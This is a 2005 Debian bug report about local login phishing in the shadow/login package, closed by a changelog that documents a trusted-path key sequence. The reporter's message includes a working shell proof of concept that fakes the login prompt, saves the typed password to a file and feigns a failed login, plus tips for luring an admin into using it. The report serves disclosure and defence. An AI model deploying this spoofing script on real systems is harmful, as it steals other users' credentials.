[Pkg-shadow-devel] Bug#305600: marked as done ([MARTIN] [DOC] Preventing login pishing)
Debian Bug Tracking System
owner@bugs.debian.org
Tue, 07 Jun 2005 09:03:39 -0700
Your message dated Tue, 07 Jun 2005 11:48:26 -0400
with message-id <E1DfgJW-0000Mj-00@newraff.debian.org>
and subject line Bug#305600: fixed in shadow 1:4.0.3-35
has caused the attached Bug report to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere. Please contact me immediately.)
Debian bug tracking system administrator
(administrator, Debian Bugs database)
--------------------------------------
Received: (at submit) by bugs.debian.org; 21 Apr 2005 00:33:48 +0000
>From gps@mittelerde.physik.uni-konstanz.de Wed Apr 20 17:33:47 2005
Return-path: <gps@mittelerde.physik.uni-konstanz.de>
Received: from honk1.physik.uni-konstanz.de [134.34.140.224]
by spohr.debian.org with esmtp (Exim 3.35 1 (Debian))
id 1DOPdW-0005F6-00; Wed, 20 Apr 2005 17:33:42 -0700
Received: from localhost (localhost.localnet [127.0.0.1])
by honk1.physik.uni-konstanz.de (Postfix) with ESMTP id 6C2F92BC43
for <submit@bugs.debian.org>; Thu, 21 Apr 2005 02:33:40 +0200 (CEST)
Received: from honk1.physik.uni-konstanz.de ([127.0.0.1])
by localhost (honk [127.0.0.1]) (amavisd-new, port 10024) with ESMTP
id 08967-14 for <submit@bugs.debian.org>;
Thu, 21 Apr 2005 02:33:36 +0200 (CEST)
Received: from gandalf.physik.uni-konstanz.de (gandalf.physik.uni-konstanz.de [134.34.140.5])
(using TLSv1 with cipher EDH-RSA-DES-CBC3-SHA (168/168 bits))
(No client certificate requested)
by honk1.physik.uni-konstanz.de (Postfix) with ESMTP id 26F282BC39
for <submit@bugs.debian.org>; Thu, 21 Apr 2005 02:33:36 +0200 (CEST)
Received: from bilbo.physik.uni-konstanz.de (bilbo.physik.uni-konstanz.de [134.34.140.32])
by gandalf.physik.uni-konstanz.de (Postfix) with ESMTP id B997CC
for <submit@bugs.debian.org>; Thu, 21 Apr 2005 02:33:35 +0200 (CEST)
Received: from gps by bilbo.physik.uni-konstanz.de with local (Exim 3.35 #1 (Debian))
id 1DOPdP-0003Qg-00; Thu, 21 Apr 2005 02:33:35 +0200
Date: Thu, 21 Apr 2005 02:33:35 +0200
From: Gerhard Schrenk <gps@mittelerde.physik.uni-konstanz.de>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: login is vulnerable to local pishing attacks
Message-ID: <20050421003335.GA13179@bilbo>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
X-Reportbug-Version: 3.8
User-Agent: Mutt/1.5.6+20040907i
Sender: Gerhard Schrenk <gps@bilbo.physik.uni-konstanz.de>
X-Virus-Scanned: by amavisd-new-20030616-p10 (Debian) at honk.physik.uni-konstanz.de
Delivered-To: submit@bugs.debian.org
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Status: No, hits=-8.0 required=4.0 tests=BAYES_00,HAS_PACKAGE
autolearn=no version=2.60-bugs.debian.org_2005_01_02
X-Spam-Level:
Package: login
Version: 1:4.0.3-30.7
Severity: important
Tags: security
Every local user can simply start a little program that imitates login and
grabs the password pretending it's wrong. It's really hard for the average user
to spot the difference and to make sure that he really didn't mistype the
password. Most users have no read access to /var/log/auth.log and thus cannot
check afterwards. If the attacker crashes X so that it doesn't restart
(unreproducible but quite easy for users who have reached their quota limit...)
and disable ssh (pulling of the network cable) you have good chances to get the
password of your local admin/root.
Proof of concept:
#!/bin/sh
# start with exec ./scriptname
trap '' INT TSTP
clear
echo
echo "Debian GNU/Linux 3.1 medusa tty1"
echo
read -p "medusa login: " user
stty -echo
read -p "Password: " nosecret
stty echo
echo
echo $nosecret > /tmp/nosecret
sleep 3
echo "Login incorrect"
echo
exec login
IMHO the easiast security enhancement for password based local
authentication seems to be (anyone better ideas?) keysequences that can
only be catched by the kernel or apps that are suid root.
For example one can put the line
kb::kbrequest:fuser -KILL -ksn file /dev/tty$(fgconsole)
in /etc/inittab. Then one *can* "zap" every time to respawn getty and
login.
In a multiuser (lab-)environment it would be desirable if the admin
could enforce such a safe keysequence before getty/login starts. I have
played with 'getty -t' and/or s/respawn/once/ in /etc/inittab but yet
not found a satisfying solution.
The best solution I found was to spawn the getty with an timeout, e.g.
3:23:respawn:/sbin/getty -t 60 38400 tty3
and to patch the default getty (agetty.c in util-linux) with an additional
signal-handler for SIGALRM. Now the user *must* first kill the outimed getty
with the safe(?) kbrequest. Quick 'n dirty idea:
sa.sa_handler = sigalrm_handler;
sigaction (SIGALRM, &sa, NULL);
...
static void sigalrm_handler(int sig) {
sigset_t nset;
raise(SIGSTOP);
}
Since I don't yet know the *right* debian default solution I open
this bug against login.
-- Gerhard
-- System Information:
Debian Release: 3.1
APT prefers testing
APT policy: (500, 'testing')
Architecture: i386 (i686)
Kernel: Linux 2.6.11.6-clients
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
Versions of packages login depends on:
ii libc6 2.3.2.ds1-20 GNU C Library: Shared libraries an
ii libpam-modules 0.76-22 Pluggable Authentication Modules f
ii libpam-runtime 0.76-22 Runtime support for the PAM librar
ii libpam0g 0.76-22 Pluggable Authentication Modules l
-- no debconf information
---------------------------------------
Received: (at 305600-close) by bugs.debian.org; 7 Jun 2005 15:51:47 +0000
>From katie@ftp-master.debian.org Tue Jun 07 08:51:47 2005
Return-path: <katie@ftp-master.debian.org>
Received: from newraff.debian.org [208.185.25.31] (mail)
by spohr.debian.org with esmtp (Exim 3.35 1 (Debian))
id 1DfgMk-0004BC-00; Tue, 07 Jun 2005 08:51:46 -0700
Received: from katie by newraff.debian.org with local (Exim 3.35 1 (Debian))
id 1DfgJW-0000Mj-00; Tue, 07 Jun 2005 11:48:26 -0400
From: Christian Perrier <bubulle@debian.org>
To: 305600-close@bugs.debian.org
X-Katie: $Revision: 1.56 $
Subject: Bug#305600: fixed in shadow 1:4.0.3-35
Message-Id: <E1DfgJW-0000Mj-00@newraff.debian.org>
Sender: Archive Administrator <katie@ftp-master.debian.org>
Date: Tue, 07 Jun 2005 11:48:26 -0400
Delivered-To: 305600-close@bugs.debian.org
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Status: No, hits=-6.0 required=4.0 tests=BAYES_00,HAS_BUG_NUMBER
autolearn=no version=2.60-bugs.debian.org_2005_01_02
X-Spam-Level:
X-CrossAssassin-Score: 7
Source: shadow
Source-Version: 1:4.0.3-35
We believe that the bug you reported is fixed in the latest version of
shadow, which is due to be installed in the Debian FTP archive:
login_4.0.3-35_i386.deb
to pool/main/s/shadow/login_4.0.3-35_i386.deb
passwd_4.0.3-35_i386.deb
to pool/main/s/shadow/passwd_4.0.3-35_i386.deb
shadow_4.0.3-35.diff.gz
to pool/main/s/shadow/shadow_4.0.3-35.diff.gz
shadow_4.0.3-35.dsc
to pool/main/s/shadow/shadow_4.0.3-35.dsc
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 305600@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Christian Perrier <bubulle@debian.org> (supplier of updated shadow package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Format: 1.7
Date: Fri, 3 Jun 2005 07:32:07 +0200
Source: shadow
Binary: login passwd
Architecture: source i386
Version: 1:4.0.3-35
Distribution: unstable
Urgency: low
Maintainer: Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>
Changed-By: Christian Perrier <bubulle@debian.org>
Description:
login - system login tools
passwd - change and administer password and group data
Closes: 59439 113191 163635 166173 169046 249372 251926 283729 300720 305600 306614 307251 307262 308479 308647 308658 308662 308839 308909 308921 309212 309380 309666 309800 310386 311554 311588
Changes:
shadow (1:4.0.3-35) unstable; urgency=low
.
* Re-apply the debian/patches/036_CAN-2004-1001_passwd_check patch
which fixed the "Adjusted password check to fix authentication bypass"
security issue (CAN-2004-1001)
* Debian packaging fixes:
- Add --host to config_options on cross build. Patch from NIIBE Yutaka.
Closes: #283729
- Enable login for GNU/Hurd in rules. First patch from Robert Millan.
Closes: #249372
- Cleanup passwd debconf stuff as md5 passwords are assumed since
1:4.0.3-19 and the resolution of #223664.
- Document the TTYPERM variable set to 0600 in the default login.defs file
Closes: #59439
- Make login and su use limits.so PAM module by default
(change made in sarge branch also)
Closes: #300720
- debian/rules: Add removal of config.log in the clean target
- debian/control:
- Add Martin to Uploaders
- Remove Sam Hartman from Uploaders. The team is now setup and this
does not really have a real meaning now. You're still welcome for
NMU's, Sam, and thanks for the good work.
- Switching from dpatch to quilt.
* Debconf translation updates:
- Portuguese spellchecked by Miguel Figueiredo
- Punjabi (Gumurkhi) added, by Amanpreet Singh Alam. Closes: #309800
* Man pages translation updates:
- German completed by reference to original man page
Closes: #311554
* Debian specific programs fixes:
- NONE
* Upstream bugs not fixed in upstream releases or CVS:
- 421_login.1_pishing:
Document how to initiate a trusted path under Linux
Closes: #305600
- set CLOSE_SESSIONS to yes in login.defs, and document why.
Closes: #163635
* Upstream bugs already fixed in upstream releases or CVS:
- 324_configure.in-no-debian-dir:
Separated from 004_configure.in : this change will not be needed when
syncing with upstream
- 325_gshadow_5_manpage:
Add a gshadow.5 man page, and clarifications in the newgrp and gpasswd
man pages.
Closes: #113191, #166173, #169046, #251926
- 326_su.1_pwconv.8-typos:
Correct typos in su.1 and pwconv.8 man pages.
Closes: #309666
* Translation updates:
- 004_configure.in, 100_LINGUAS
Add Vietnamese to LINGUAS. Patch for LINGUAS in configure.in moved
from 004_configure.in to the new 100_LINGUAS patch
- 101_cs: Czech updated by Miroslav Kure
Closes: #308658
- 102_de: German updated by Dennis Stampfer
- 104_fr: French updated by Jean-Luc Coulon
Closes: #308909
- 111_ca: Catalan completed by Guillem Jover
Closes: #309212
- 108_sv: Swedish completed with the help of Magnus Holmgren
Encoding issues fixed
Closes: #309380
- 109_uk: Ukrainian completed by Eugeniy Meshcheryakov
Closes: #308647
- 120_nl: Dutch updated by Bart Cornelis
Closes: #308662
- 124_ru: Russian updated by Yuri Kozlov
Closes: #308839
- 129_ru: Romanian updated by Sorin Bataruc
Closes: #308921
- 130_zh_TW: Tradition Chinese updated by Tetralet
Closes: #311588
- 131_tl: Tagalog updated by Eric Pareja
Closes: #310386
- 132_vi: Correct file used for Vietnamese tanslation
Closes: #306614, #307251, #307262, #308479
Files:
c6ea9b25080b8c93386290646686deb3 823 base required shadow_4.0.3-35.dsc
8be96b6637309bea08efe10eda1dc9eb 1413235 base required shadow_4.0.3-35.diff.gz
8c3454ad98e3805067f28a4d3ee0b194 532514 base required passwd_4.0.3-35_i386.deb
a9a395fc2095091d1f07ce0360ca6fe1 591114 base required login_4.0.3-35_i386.deb
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (GNU/Linux)
iD8DBQFCpbxd1OXtrMAUPS0RAmZJAJwPMPuV97thtUsWt6/A/KzwhOEvEgCfUKfy
mHoY5PPl10/p1iPo5IR2GnQ=
=6Ybw
-----END PGP SIGNATURE-----